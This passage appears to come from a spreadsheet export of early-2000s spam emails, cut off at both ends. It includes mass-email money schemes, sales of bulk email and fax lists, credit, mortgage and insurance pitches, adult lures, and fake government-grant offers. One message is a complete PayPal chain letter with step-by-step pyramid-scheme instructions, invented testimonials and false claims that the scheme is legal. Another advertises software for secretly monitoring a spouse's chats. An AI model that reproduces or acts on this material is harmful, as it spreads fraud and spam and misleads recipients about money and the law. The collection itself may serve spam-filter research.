$5,000 + 4..... $50,000 + 5.... $500,000 .... Grand Total=$555,550.00REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF
5,000 YOU MAILED TO. Dare to think for a moment what would happen if
everyone or half or even one 4th of those people mailed 100,000 e-mails
each or more?THE NUMBERS DON'T LIE. VISIT CBN AT
http://www.cashbynet.net/Calculator/ to
plug in your own numbers and see the results.
METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
==================================================Advertising on the net is extremely inexpensive and there are hundreds
of FREE places to advertise. Placing a lot of free ads on the Internet
will easily get a larger response than just emails alone. We strongly
suggest you start with Method # 1 and add METHOD #2 as you begin to
become more knowledgeable about the business and study the 5 reports.
Remember to always provide same day service on all orders to ensure
proper return on the back end - this means quicker profits for you.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did not,
continue advertising or sending e-mails until you do.**ONCE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CASH BY NET:Cash By Net has become a very popular business for many sole
proprietors.  However, this program will only work if you are willing
to put in the time and effort to make it work.  This is not a program
for everybody.  If you are just a passer by, and don't have a personal
vision of success, delete this now.  Life all comes down to a few
opportunities - this is one of them. Have the courage to be free, and
have the drive to reach your goals.  Before you start working with us,
take 10 minutes and write down your personal goals.  What do you want
in 5 years? 1 year? 6 months? Be realistic - set your goals high enough
so you will work hard to reach them. Remember: You are the owner of your
own destiny, make these goals become reality - only you know what needs
to be done.You now possess the ideas, information, materials, and opportunity to
become financially independent and reach your highest dreams.  I hope
you come along for the ride, it's a wonderful world ahead.Copyright CashByNet 2000
=================================================
http://www.cashbynet.netThe following message was sent to you as a valued webMillion member.
If you wish to unsubscribe please click here:
http://www.webmillion.com/remove_me.html?bl_id=9999
</t>
  </si>
  <si>
    <t>FUTURE TECH INTERNATIONALSPECIAL OFFER that "BLOWS AWAY TRADITIONAL MARKETING" - Advertising Age.The most powerful fully exportable CD Fax Database on the market
1,500,000 Business Fax NumbersOVER 1.5 MILLION FAX NUMBERS FULLY EXPORTABLE!
Usually Sells for $295. For a limited time only we are offering them for:ONLY $49.95 USD
(Never before have this many fax numbers been sold for so cheap)TARGETED EMAIL LIST
100 MILLION EMAIL ADDRESSES
Usually sells for $195.00. For a limited time only we are offering them for:ONLY $79.95 USDSPECIAL PACKAGE DEAL FOR BOTH DIRECTORIES:ONLY $99.95 USDMORE THAN 34 CATEGORIES SUCH AS:
-Multi level marketers
-Opportunity Seekers
-Telephone Area Code
-Country, City, State, etc...
-Travel &amp; Vacations
-Opt-in
-People intersted in investments
-People or businesses who spent more than $1000 on the web in the last 2 months
-AND MANY MORE*Everything o n this disk is in TEXT file format and fully Exportable.
*The CD is as easy to use as browsing your C drive in Explorer.TO ORDER YOURS CALL 416-467-6585OR FAX THE FORM BELOW TO 416-467-8986ORDER FORM (Please PRINT clearly)-------------------------------------------------------------------------------------------------------------------
Name:Company Name:Email Address:Tel#:Shipping Address:City:                                   Zip/Postal Code:Country:---------------------------------------------------------------------------------------------------------------------
PRODUCT:[] Email Address CDROM (100 Million Addresses) $79.95
[] Fax Directory (1.5 Million Business Fax Numbers) $49.95
[] SPECIAL PACKAGE DEAL (Both Fax &amp; Email Directories) $99.95SHIPPING OPTIONS:[] Regular Mail (1 - 2 weeks delivery) $5.95
[] Priority Mail (2 - 5 business days) $12.95
[] Fedex Overnite $25.95TOTAL AMOUNT TO BE BILLED TO CREDIT CARD: $----------------------------------------------------------------------------------------------------------------------
CREDIT CARD INFO:[] VISA  [] MASTERCARD  [] AMERICAN EXPRESSCard #:Expiry Date:Name on Card:Billing Address:Authorized Signature:
----------------------------------------------------------------------------------------------------------------------
PLEASE FAX THIS FORM BACK TO 416-467-8986TO ORDER BY MAIL:PLEASE send the ORDER FORM BACK and PRODUCT FORM withy a money order payable to FUTURE TECH INTERNATIONAL for the balance to:FUTURE TECH INTERNATIONAL
IMPORT EXPORT COMPANY
85 THORNCLIFFE PARK DRIVE SUITE 3602
TORONTO, ONTARIO
CANADA (POSTAL) M4H 1L6FOR ANY QUESTIONS PLEASE FEEL FREE TO CALL US AT 1-416-467-6585*PROVIDE YOUR EMAIL ADDRESS SO THAT WE CAN SEND YOU A RECEIPT FOR YOUR TRANSACTION
For email removals sjshdhd-39e2@yahoo.com</t>
  </si>
  <si>
    <t xml:space="preserve">Is Your Credit A Mess?
Do you want Perfect Credit again?
Wouldn't it be nice to easily get loans for cars, boats, and houses?We have the Solution!! ONLINE CREDIT REPAIR!!!  Now you can clean up and repair your bad credit online from the convenience 
  of your home computer. Our program is 100% effective for helping you 
  fix your credit, and you can watch your credit with real-time updates.
Its been called the #1 program for fixing bad credit!Click 
  Here for FREE information Now!
Your 
  email address was obtained from a purchased list, Reference # 1010-11002Â  
  If you wish to unsubscribe from this list, please Click 
  here and enter your name into the remove box. 
</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by
 (jm@news4.inlink.com) on Tuesday, May 21, 2002 at 09:22:41
---------------------------------------------------------------------------: 
www.THOMB.com is the only free site that is entirely made up of British babes. Over 10,000 fresh pictures of the UK's sexiest girls, more than any other site out there.No Credit Card.
Only Free Galleries.25155843&amp;&amp;25155843-25155843
---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">
Â You can't predict the future, but you can always prepare for it.Â               DOUBLE               Your Life Insurance Policy For 
              NO EXTRA COST!              Â Compare rates from top insurance companies around the country
In our life and times, it's important to plan for your family's future, while 
being comfortable financially. Choose the right Life Insurance policy today.Â 
You'll be able to compare rates and get a
Free Application
in less than a 
minute!
COMPARE YOUR COVERAGE$250,000
              as low as$6.50
per month
Â $500,000
              as low as              $9.50
              per month
Â $1,000,000
              as low as              $15.50
              per month
Â Get your
FREE
instant quotes... Compare the lowest prices, then...
Select a company and Apply Online.
                  DON'T 
              MISS THIS!! GET YOUR FREE INSTANT QUOTE               CLICK FOR YOUR FREE QUOTE, NOW!              Â 
(Smoker rates also available)              Â 
MakeÂ Â Â Â  
              Insurance Companies Compete For Your Insurance.
Â 
We Have 
            Eliminated The Long Process Of Finding The Best Rate By Giving You 
            Access To Multiple Insurance Companies All At Once.Apply 
                now and one of our Insurance Brokers will get back to you within 
                48 hours.CLICK HERE!If You wish to be removed from future mailings please "Clicking 
Here" . 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Justin,	
					Net Nation IT Recruitment Candidate Update NewsletterOur goal is to help you achieve your companies goals by providing you with
the best candidates on the job market today, with excellent and professional
service.www.netnation.ie						Tel: 01 635
9760This month Justin, we have excellent IT candidates available, along with
some excellent IT Sales Super Stars. **Stop Press** Net Nation IT Recruitment will save up money on your contracting rates.
Call us now on 01 6359760 with your latest IT contracting jobs!Net Nation is a member of the National Recruitment Federation which is a
standard of credibility and strong ethical standing within the Irish
Recruitment industry. 
******RDBMS/Project Managers/Mainframe.	Garry Barcoe gbarcoe@netnation.ie
Tel: 01 635 9760Oracle Developer:	4 years PL/SQL, Forms and Reports 6i and Designer
2000 exp. Gb01RPG Programmer:	10+ years exp in all industries. Good grounding in ERP
systems including JD Edwards.Senior Operations Manager:	15+ years exp. Mainframe, Network, Desktop
and Development Background in Financial arena. Gb03Senior AS400 Contractor:	13 years exp. Areas of expertise includes
AS400, NT and Citrix as well as various anti-virus and email systems.
Immediately available! Gb04www.netnation.ie
******Networking/ PC Support	Conor Walsh cwalsh@netnation.ie Tel:01 635 9760Unix Administrator:	8 yrs exp., Solaris, HP UX, Sco, Aix, Oracle 7 &amp; 8i,
SQL, NT/2000 Cw01Snr. Systems Admin: 10 yrs exp. Unix (Solaris), NT/2000, AS400, Cisco,
Networking, PABX, Security, Firewalls, SAP, Mgmt experience, Internet Cw02Technical Support: 1-year exp., NT &amp; Win.2000, Networking, TCP/IP, Exchange,
Eager, Great Attitude Cw03Cisco Contractor: CCNP/CCDP/CCNA, Full range of Cisco and Juniper Routers.
Immediately Available! CW04******IT Sales/Business Development Gerry Nolan gnolan@netnation.ie
Tel:01 635 9760Sales Manager: Very experienced Sales Manager in software and consulting
areas. Strong blue chip experience. Excellent sales and people management
skills Ref Gn01Business Development Manager: Telecoms sector, strong track record in
hardware sales. Good experience in the Irish market place. Ref Gn02Sales/Account Manager: IT consulting sales. Background in hardware sales.
Seeking senior IT Sales or Account Manager role. Ref Gn03Software Development: Cathal O Donnell codonnell@netnation.ie  Tel: 635 9760Java Developer:	4 years experience developing with Java, EJB, JSP, J2EE, XML
with Oracle experience working on NT and Unix. Co01VB Developer:	10 years experience in the IT sector. Key skills include VB,
Java, Oracle, SQL and Access. Has worked with Windows and Unix primarily in
the financial sector. Co02Software Developer:	C++ Contract Developer worked in manufacturing and
financial sectors. Key skills include C++, VB, COM, DCOM, COM+, UML, Oracle,
Sql Server, Unix and NT. Immediately available!*********************************************************************Justin If you require more details on any of the candidates listed or have
any other IT or Sales positions please call us now on 01 635 9760 or email
us on jobs@netnation.ie  For more details on Net Nation visit our web site www.netnation.ie
We have sent you this newsletter with the view that it will be relevant to
your business. If you do not wish to receive this newsletter please reply
with REMOVE in the subject title.
Regards
Garry BarcoeNet Nation IT Recruitment
68 Pearse Street
Dublin 2
Tel: 01 635 9760
jobs@netnation.ie
www.netnation.ie </t>
  </si>
  <si>
    <t xml:space="preserve">Mortgage Rates Are About To Rise
Cash In Now!Our programs will help you with:-Debt Consolidation-2nd Mortgage-Refianance-Home ImprovementOur free no obligation quite has already helped 
thousands of homeowners, just like you.
Click Here to start saving
If you would rather not be included in our future mailings, click here.
</t>
  </si>
  <si>
    <t xml:space="preserve">I just got a webcam and computer for my birthday and I just finished
my first homepage. I added some of my modeling pictures there so if you
think you can help my career please let me know. I could also use some
opinions on how to make my site look better. If you can't help and you know
someone that can, please forward them this e-mail. I need money and can sure
use the work. I just added my most recent set of pictures.If you don't want to look at my pics,  I am 5'5 125, blonde hair, blue eyes
and I play volleyball.Link to my site: http://63.107.112.67/profiles/julie20Thanks,
JulieOh, if you do not know who I am and I sent this e-mail to you by mistake
please disregard it. If you would like to make sure to be removed from my
address book, please click here http://63.107.112.67/optout.html
and i have a program to make sure I do not send you more mail.Sorry I will
not ever try talking to you again!
</t>
  </si>
  <si>
    <t xml:space="preserve">
Accept Credit Cards - Everyone Approved
NO CREDIT CHECKSDO IT NOW
126432211
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT INFORMATION:The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9358vISa9-l9
</t>
  </si>
  <si>
    <t xml:space="preserve">THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301TO REMOVE YOURSELF SEND A BLANK E-MAIL TO:removal992002@yahoo.comHi,You most likely have seen or heard about 
"The Letter" $5.00 Paypal Program" that has been seen lately 
on 20/20 and OPRAH WINFREY...etc...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business!!THE FACTS ARE SIMPLE;- IF YOU NEED TO MAKE A FEW
THOUSAND DOLLARS REALLY FAST, THEN THIS PROGRAM I'M GOING TO SHARE WITH 
YOU 
IS THE WAY TO DO IT! IT'S THE FASTEST, EASIEST PROGRAM YOU WILL EVER DO!!!Here's something which (I trust) will be of interest
to you! Please read all of this. This is not something 
that I would normally look at, except that I read an 
article in the Wall Street Journal on 6/16/2001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Internet-type fast.' Everything is done on the
Internet by E-mail.NEED PROOF? Here are just two testimonials from
individuals who decided to invest nothing more than a 
little of their time.TESTIMONIALS FROM:Tony Stevens, Vandenberg AFB, CA:
Hey! I got your e-mail! YOU ROCK! I sent it to all of
our frat brothers.....and while I haven't seen my $20 
grand yet, I'm up to $8,285. Hook me up when you run 
this program again........Mary Gathers, Columbia, SC:
Hey cuz! This is Mary. I only have one thing to say to
you... OH MY GOD! I sent 20 e-mail's out like you said 
and went on vacation. When I got back, my account was 
up to over $12,000! I owe you!GETTING STARTED.If you're not already a user, the very first thing you
need to do is go to PayPal and sign up. It takes two minutes 
and PayPal will deposit $5.00 in your account. That makes this 
program FREE!Here's the link:https://www.paypal.com/refer/pal=larryspaypal%40yahoo.comBE SURE TO SIGN UP FOR A PREMIER (FREE) ACCOUNT! OR YOU'LL BE LIMITED TO 
$100 
DOLLARS ONLY!!! YOU WILL MAKE MUCH MORE THAN THIS!!!Then...... E-mail $5.00 from your PayPal account ($5.00 free) 
to the FIRST name on the list (No.1) along with a little note
like "Please add me to your mailing list." BE PREPARED TO GET
EXCITED.... YOU 
WON'T BE DISAPPOINTED!!! Don't laugh! Try this while you wait for the 
others 
to start working. One hour of work to get started - no mailing lists. No 
printing, copying or waiting and the concept is 100% legal (refer to US 
Postal and 
Lottery Laws, Title 18, Section 1302 and 1341, or Title 18, 
Section 3005 in the US code, also in the code of Federal 
Regulations, Volume 16, Sections 255 and 436, which state a 
product or service must be exchanged for money received). Here's How It Works. Unlike many other programs, this 
THREE LEVEL PROGRAM is more realistic and much, much
faster. Because it is so easy, the response rate is VERY 
HIGH, VERY FAST-Internet E-mail FAST-and you will see 
results in just two weeks or less! JUST IN TIME FOR NEXT 
MONTHS BILLS! You need only mail out 20 copies (not 200 
or more as in other programs). Ideally, you should
send them to people who send their programs to you or to 
personal contacts who are already working on the web, 
because they know these programs work and they are already 
believers in the system! Besides, this program is 
MUCH, MUCH FASTER and has a HIGHER RESPONSE RATE! Even if you are already 
in 
another program, stay with it, but do
yourself a favor and DO THIS ONE as well. START RIGHT NOW! It's simple and will only cost $5.00 max. It will pay off long 
before others even begin to receive letters! Just give ONE 
person a $5.00 gift (REMEMBER THOUGH, this $5.00 is the $5.00 YOU GET 
WHEN 
YOU SIGN UP FOR YOUR new PayPal account). That's all! If you already have 
a 
PayPal account and do not receive the $5.00, feel free to donate a $5.00 
GIFT 
to
the person in the No.1 spot and add your name on the list 
at No.3 position having moved up the remaining two. Follow 
the simple instructions and in two weeks you will have $20,000 
in your bank account!Because of the VIRTUALLY ZERO INVESTMENT, SPEED and HIGH PROFIT 
POTENTIAL, 
this program has a VERY HIGH RESPONSE RATE! All from just one $5.00 
transaction that you get from PayPal!!!Follow These Simple Instructions: E-mail the $5.00 from your Paypal account to the FIRST 
name on the list (No.1) along with a note saying 
"subscribe me to your mailing list". Only the first 
person on the list gets your name and $5.00 gift. Edit the list, removing the FIRST (No.1) NAME FROM THE LIST. Move the 
other 
two names UP and ADD YOUR NAME. Don't try to add your name in the first 
place 
in order to earn money fast! 
If you do that, you will ONLY reach people you send e-
mail to then your name will be immediately removed
from the No.1 place and you can't reach more people! But if 
you add your name on the No.3 place, there will be tons of 
people receiving e-mail's later and when your name is No.1!!! NOTE: Do not forget to replace the PayPal referring URL in 
the body of the letter with your own PayPal referring URL. 
Send out 20 copies (minimum) of this letter.ALSO NOTE: By sending this letter and the payment via E-MAIL, the 
response 
time is much faster... ELECTRONIC TRANSFER INTERNET FAST! Consider this! Millions of people surf the Internet
everyday, all day, all over the world! Here are the 3 people 
to start with. Sign up, send $5.00 to the first person, move 
the other two up to Nos 1 &amp; 2 respectively and add your own 
e-mail address at No.3. Be sure to use your email address that is 
associated 
with your PayPal account.*************************************1.  csreddy3@rediffmail.com2.  tomk4@prodigy.net3.  larryspaypal@yahoo.com *************************************There are fifty thousand new people who get on the
Internet every month! An excellent source ofemail addresses 
is the people who send you offers by email.
The source is UNLIMITED! It boggles my mind to
think of all the possibilities! Mail, or should I 
say 'E-mail', your letter and payment TODAY! It's 
so easy. One hour of your time, THAT'S IT!
To send your letter by e-mail, copy this ENTIRE PAGE
and paste it in the message of your E-mail. TO DO THIS:
1. Go in your toolbar to "edit" and "select all"
2. Go in your toolbar to "edit" and select "copy"
3. Start (compose) a new E-mail message (make sure
it's PLAIN TEXT so everyone can view it!)
4. Fill in your Address and Subject Box
5. Go to "edit" and "paste" (Then you can format it
anyway you want!)
Now you can edit the addresses with ease. Delete the
top name, adding your name and address to the bottom 
of the list, then simply changing the numbers. Remember, 
YOUR NAME goes on the BOTTOM and the other 2 names move up. But DO NOT 
forget 
to send $5.00 via PayPal (along 
with your note) to the position #1 - TOP E-MAIL
address before deleting it!NOTE: Be sure to replace the PayPal referring URL in
this e-mail of the letter with your own PayPal 
referring URL;
https://www.paypal.com/refer/pal=larryspaypal%40yahoo.com
THERE'S NOTHING MORE TO DO.
When your name reaches the first position in a few
days, it will be your turn to collect your MONEY!
The money will be sent to you by 2,000 to 4,000 people
like yourself, who are willing to invest one hour to 
receive $20,000 in cash! That's all! There will be a 
total of $20,000 in $5.00 bills in your mailbox (account) 
in two weeks. $20,000 for one hour's work! This is 
real money that you can spend on anything you wish!
Just deposit it to your own bank account or spend it 
directly from your PayPal account!!! It's just that 
easy!!! I think it's WORTH IT, don't you?GO AHEAD--- TRY IT!!! EVEN IF YOU MAKE JUST 3 OR 4
THOUSAND, WOULDN'T THAT BE NICE?IF YOU TRY IT, IT WILL PAY! CAN YOU DO IT AGAIN? OF
COURSE YOU CAN---This plan is structured for everyone to send only 20
letters each. However, you are certainly not limited 
to 20. Mail out as many as you want. Every 20 letters 
you send has a return of $20,000 or more. If you can 
E-MAIL forty, sixty, eighty, or whatever, GO FOR IT! 
THE MORE YOU PUT INTO IT THE MORE YOU GET OUT OF IT! Each time you run 
this 
program, just follow steps 1
through 3 and everyone on your gift list benefits! 
Simple enough? You bet it is! Besides, there are no 
mailing lists to buy (and wait for), and trips to the 
printer or copier, and you can do it again and again 
with your regular groups or gift givers, or start up 
a new group. Be SURE and PAY the first person on the 
list. This is proof that you paid to get put on the 
list which is the service rendered to make all this 
legal!!! Why not? It's working! Each time you receive 
an MLM offer, respond with this letter! Your name will 
climb to the number one position at dizzying rates. 
Follow the simple instructions, and above all, PLEASE 
PLAY FAIR. That's the key to this program's success. 
Your name must run the full gamut on the list to produce 
the end results. Sneaking your name higher up on the list 
WILL NOT produce the results you think, and it only cheats 
the other people who have worked hard and have earned the 
right to be there. So please, play by the rules and the 
$$$ will come to you!
$$$ E-MAIL YOUR LETTERS OUT TODAY! Together we will 
prosper! $$$ You are probably skeptical of this, 
especially with all the different programs out there 
on the web, but if you don't try this you will 
never know. That's the way I felt. I'm glad I did it!
I've been watching this type of program for years and
this is about as easy and fast as you can get it and 
it can even be free to try now with Pay Pal, no stamps, 
no envelopes, no copies to be made - just a little effort 
and faith!!! This program really "Keeps It Short and Simple"! OH BY THE WAY....each time someone signs up with your link 
under your name... you also make $5.00 from PayPal...
so they pay to open up the account but they also pay you when 
someone signs up from being referred by you. AWESOME! 
Let's all make some serious money 
$$$$$$CLICK HERE TO BEGIN:https://www.paypal.com/refer/pal=larryspaypal%40yahoo.comPlay by the rules, this doesn't cost anything but your
time, and if everyone plays fair everyone WINS.
FOLLOWING ARE SOME NOTES ABOUT PayPal WHICH YOU MAY FIND HELPFUL:PayPal 
lets 
you pay anyone with an e-mail address and is the world's No.1 online 
payment 
service - it's accepted on over 3 million eBay T auctions and thousands 
and 
thousands of online shops. You can also use PayPal to 
pay your friends - example; it's a convenient way to 
split the phone bill with your roommate, send cash to your kids in 
college,or 
send cash to someone in another country. Better yet, you can also 
earn $5 while you do it. Each time someone signs up for an account and 
completes the Refer-a-Friend requirements, we'll give you a $5 BONUS! 
When 
you send money through Pay Pal, you can fund your payments with your 
credit 
card or checking account. You won't have to worry about your privacy, 
because 
PayPal keeps your accounting information safe. Making a purchase with 
PayPal 
is more secure than mailing a check or giving your credit card number to 
a 
stranger. That's why over 9 million people from around the world use 
PayPal 
to move money.
Signing up for a PayPal account is easy. It takes only
a couple of minutes and, if you complete the bonus 
requirements PayPal will automatically add $5 to your 
account balance. To learn more about PayPal visit the 
web site athttps://www.paypal.com/refer/pal=larryspaypal%40yahoo.com"Best of the Web" -Forbes
"Using the service is actually safer than a check or
money order"- Wall Street Journal
"PayPal can play a major role in your life. You can
use it to pay for stuff at auction sites, settle 
dinner debts with friends or nudge your cousin to 
repay that $50 he borrowed at the family reunion.- Time
PS. Does this sound too good? Well maybe to some skeptics it
is. But it actually works, and is worth 
the few minutes of your time now. 
P.S.S. If You Decide to Join in on this Venture Please Return a blank 
email 
to the last email address on the list (#3) with "Thanks, I'll Join" in
the 
subject line. This Helps everyone keep track of their progress. You Will 
Not 
be added to My Email Listofsknxxdqgtgqvsoiytkivajvtj
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!Is your spouse cheating online? Are your kids talking to dangerous people on instant messenger?
Find out NOW! - with Big Brother instant software download.
Click on this link NOW to see actual screenshots and to order!
http://213.139.76.69/ec/bigbro/M30/index.htmTo be excluded from future contacts please visit:
http://213.139.76.69/PHP/remove.php
bacalau
</t>
  </si>
  <si>
    <t>Secured Investements
  Earn 15%-300% Interest On Your Money
GUARANTEED BY THE GOVERNMENT!
Government Secured Tax Cerificates Provide:
The highest guaranteed interest returns compared to any other investment.
A return up to 100 times your money backed by government secured property.
Security in your investment that the stock market cannot compare to.
Real estate for pennies on the dollar!America's largest single source
  of information/education for the government tax industry.  Celebrating over
  12 years of providing quality, leading edge education for the serious entrepreneur &amp; investor.
Receive your
FREE video of "INSIDER SECRETS OF INVESTING
  IN GOVERNMENT SECURED TAX CERTIFICATES."
(Over 90 min. of inside strategies, a $3995 value)Fill out the no obligation form below for more information.
Required Input Field*Name
*
State
*
Day Phone
*
Night Phone
Best time to contact Morning Afternoon
Evening
E-mail Address
*Objective Secured Investments Business Opp
New CareerAll of the Above
*All tax liens and deeds directly support local
      fire departments, police departments, schools, roads, and hospitals.  Thank you for your interest and support.
      To be removed, please  
      click 
      here.</t>
  </si>
  <si>
    <t xml:space="preserve">v
America's #1 Government Grant Program!
The Federal Government Gives Away Billions of Dollars In Grants Each &amp; Every Year (Free
                            Money!)
                            Take Advantage Of This Opportunity Today And Change Your Life
                            Forever!
Â  30 DAY MONEY BACK GUARANTEE!Â 
Can't wait on the mail?
                            You can receive our fabulous Grant Guide Book in one easy Download! Start searching for Grants In Minutes! Simply order your Grant Guide Book today by sending
                            $21.95 Cash, Check or Money Order with your e-mail address enclosed to:Â 
Â  Government Grants &amp; LoansÂ 
P.O. Box 101262Â 
Cape Coral FL 33910Â  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
Attention College Students:A huge Amount of money is out there for you. Incredibly enough the U.S. Government does care about Your Education! Over 3 Billion Dollars for College Grants, Pell grants &amp; Scholarships is Given Away. No credit checks or collateral required. Start Applying Online now! There are Low Interest and No Interest Government Loans also Available. There are also Special grants for Research &amp; Technology.Â 
Â  
Â  
Good News For Women &amp; Minorities:Two billon dollars of free money is available for you from starting a business to personal grants. Take Advantage Of this opportunity! This is your tax money, get your share today!
Purchase Your Dream Home or Get Money for Home Improvements:Â 
Government housing grants, low interest and no interest loans are available. Learn about the FHA; who they are and how they can help you!Â 
There are also reserved free government cash grants now available for the following special interest groups:Â 
                            American IndiansÂ 
Veterans 
Family Members of Veterans 
Low Income Families 
Community Block Grants 
Non Profit Organizations 
First Time Home Buyers 
Artists 
MusiciansÂ 
Nurses 
Teachers 
Researchers 
The Disabled 
People Suffering From HIV and AIDS 
Substance AbuseÂ 
There are literally millions available; all you have to do is ask!Attention:Â  
None of these Grants require a credit check, collateral, security deposits or co-signers.Â  You can apply even if you have a bankruptcy or bad credit, it doesn't matter. ItÂ’s free money, never repay!Â 
Our Grant Guide Program Includes:Â 
                                Information on how to write your grant proposal.Â 
                                Complete listing of grants by category &amp; agency! 
Complete listing of college scholarships, grants ! 
Information on amount of funding available! 
Complete Information on low interest &amp; no interest loans!Â 
                                Phone numbers &amp; addresses of grant sources! Free Shipping &amp; Handling for A Limited Time!
30 DAY MONEY BACK GUARANTEE! If you do not like our wonderful product for ANY reason and you would like your money back, simply return your order and you will be refunded.
Order now by sending $21.95 Cash, Check, or Money Order to:Government Grants &amp; LoansP.O. Box 101262Cape Coral FL 33910Electronic Delivery of Grant Guide:Can't wait on snail mail? Copies of the Grant Guide book are also available via E-Mail. When you send off for your fabulous book enclose your e-mail address and we will send the book to your e-mail account A.S.A.P.!
                            We have assembled a team of highly trained professionals which in turn has created the finest free cash grant program in America. We have dedicated ourselves to providing a quality program that provides not only hundreds of free cash sources but also instructs you in the most important step, and that is the
                            proposal.
  To remove your email address from
                            our mailing list please
                             Click Here
Â  vÂ  vahpvqeqkoacigulvlrcqr
</t>
  </si>
  <si>
    <t xml:space="preserve">v
America's #1 Government Grant Program!
The Federal Government Gives Away Billions of Dollars In Grants Each &amp; Every Year (Free
                            Money!)
                            Take Advantage Of This Opportunity Today And Change Your Life
                            Forever!
Â  30 DAY MONEY BACK GUARANTEE!Â 
Can't wait on the mail?
                            You can receive our fabulous Grant Guide Book in one easy Download! Start searching for Grants In Minutes! Simply order your Grant Guide Book today by sending
                            $21.95 Cash, Check or Money Order with your e-mail address enclosed to:Â 
Â  Government Grants &amp; LoansÂ 
P.O. Box 101262Â 
Cape Coral FL 33910Â  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
Attention College Students:A huge Amount of money is out there for you. Incredibly enough the U.S. Government does care about Your Education! Over 3 Billion Dollars for College Grants, Pell grants &amp; Scholarships is Given Away. No credit checks or collateral required. Start Applying Online now! There are Low Interest and No Interest Government Loans also Available. There are also Special grants for Research &amp; Technology.Â 
Â  
Â  
Good News For Women &amp; Minorities:Two billon dollars of free money is available for you from starting a business to personal grants. Take Advantage Of this opportunity! This is your tax money, get your share today!
Purchase Your Dream Home or Get Money for Home Improvements:Â 
Government housing grants, low interest and no interest loans are available. Learn about the FHA; who they are and how they can help you!Â 
There are also reserved free government cash grants now available for the following special interest groups:Â 
                            American IndiansÂ 
Veterans 
Family Members of Veterans 
Low Income Families 
Community Block Grants 
Non Profit Organizations 
First Time Home Buyers 
Artists 
MusiciansÂ 
Nurses 
Teachers 
Researchers 
The Disabled 
People Suffering From HIV and AIDS 
Substance AbuseÂ 
There are literally millions available; all you have to do is ask!Attention:Â  
None of these Grants require a credit check, collateral, security deposits or co-signers.Â  You can apply even if you have a bankruptcy or bad credit, it doesn't matter. ItÂ’s free money, never repay!Â 
Our Grant Guide Program Includes:Â 
                                Information on how to write your grant proposal.Â 
                                Complete listing of grants by category &amp; agency! 
Complete listing of college scholarships, grants ! 
Information on amount of funding available! 
Complete Information on low interest &amp; no interest loans!Â 
                                Phone numbers &amp; addresses of grant sources! Free Shipping &amp; Handling for A Limited Time!
30 DAY MONEY BACK GUARANTEE! If you do not like our wonderful product for ANY reason and you would like your money back, simply return your order and you will be refunded.
Order now by sending $21.95 Cash, Check, or Money Order to:Government Grants &amp; LoansP.O. Box 101262Cape Coral FL 33910Electronic Delivery of Grant Guide:Can't wait on snail mail? Copies of the Grant Guide book are also available via E-Mail. When you send off for your fabulous book enclose your e-mail address and we will send the book to your e-mail account A.S.A.P.!
                            We have assembled a team of highly trained professionals which in turn has created the finest free cash grant program in America. We have dedicated ourselves to providing a quality program that provides not only hundreds of free cash sources but also instructs you in the most important step, and that is the
                            proposal.
  To remove your email address from
                            our mailing list please
                             Click Here
Â  vÂ  vwpeiycjkquuferakoenjaxo
</t>
  </si>
  <si>
    <t xml:space="preserve">Insurancetd {font-family: arial}
Save up to 70% on your Life Insurance!Why Spend More Than You Have To?Life Quote Search saves you time and money. 
Check out these example monthly rates...10-year level premium term insurance(20 and 30 year rates also available)$250,000
$500,000
$1,000,000
Age
Male
Female
Male
Female
Male
Female30$12$11$19$15$31$27
40$15$13$26$21$38$37
50$32$24$59$43$107$78
60$75$46$134$87$259$161
(Smoker rates also available)Take a minute to fill out the simple form below and receive a FREE quotecomparing the best values from among hundreds of the nation's top insurance companies!*All Fields requiredFirst Name:Last Name:Address:
City:State:Zip:Day Phone: (xxx-xxx-xxxx)Evening Phone:Fax: (xxx-xxx-xxxx)Email:
Male or Female:Date of Birth:
(mm/dd/yy)Type of Insurance:30
Yr Guaranteed Level Term20
Yr Guaranteed Level Term15 Yr Guaranteed Level Term10
Yr Guaranteed Level TermUniversal Life2nd-to-die
(Survivorship Insurance)Insurance Amount:$100,000$150,000$200,000$250,000$300,000$350,000$400,000$450,000$500,000$550,000$600,000$650,000$700,000$750,000$800,000$850,000$900,000$950,000$1,000,000$1,500,000$2,000,000$2,500,000$3,000,000$3,500,000$4,000,000$4,500,000$5,000,000above $5,000,000Height:
Weight: lbsTobacco Use:(Please
Select)Have never smoked or used nicotineUsed to smoke, but quit less than 1 yr agoUsed to
smoke 1-3 yrs agoUsed to smoke 3-5 yrs agoUsed to smoke over 5 yrs agoCurrently smoke cigarettesOther
nicotine use-cigars/pipe/chew/patchHealth Status:(Please
Select)Excellent: trim and athletic, no medicationsGood:
no infirmities and no medicationsFair: slightly overweight
or taking medicationPoor: have/had a serious health condition
Health conditions?YesNoExplain:Prescription medications?YesNoExplain:Do you engage in any hazardous activities?(i.e. scuba,skydiving,private pilot,etc.)YesNoExplain:Did your parents or siblings have heart disease or cancer prior to age 60?YesNoExplain:If you are in receipt of this email in error and/or wish to be removed from our list, PLEASE CLICK HERE AND TYPE REMOVE. If you reside in any state which prohibits email solicitations for insurance, please disregard this email.
We will open your email application to submit your inquiry. All quotes will be from insurance companies rated A-, A, A+ or A++ by A.M. Best. Actual premiums and coverage availability will vary depending upon age, sex, state, health history and tobacco use. THIS IS NOT AN OFFER OR CONTRACT TO BUY INSURANCE PRODUCTS, but rather a confidential informational inquiry.  Life Quote Search is an information gathering service and does not sell insurance.  All information submitted is strictly confidential, and will be given to an insurance professional licensed in your state of residence, who will contact you and provide your quote directly. </t>
  </si>
  <si>
    <t>Hi There,I recently came across a copy of your resume I found on the 
internet. In case you're back on the market, you should check
out this new web service that instantly posts your resume to
over 75 career websites.You fill out one online form and immediately you can be seen
by over 1.5 million employers and recruiters daily! It works.In about 15 minutes you'll be posted to all the major sites
like: Monster, CareerBuilder, HotJobs, Dice, Job.com and
more. It'll save you 60 hours in research and data entry.Check out http://start.resumerabbit.com - I think you'll
like it. You don't even need a current resume.It's a tough job market right now. So if you've got a good
job hold on to it. But these days it's smart to have a few
irons in the fire too. That only happens by being in all the
right places at all the right times. So even if you do it by
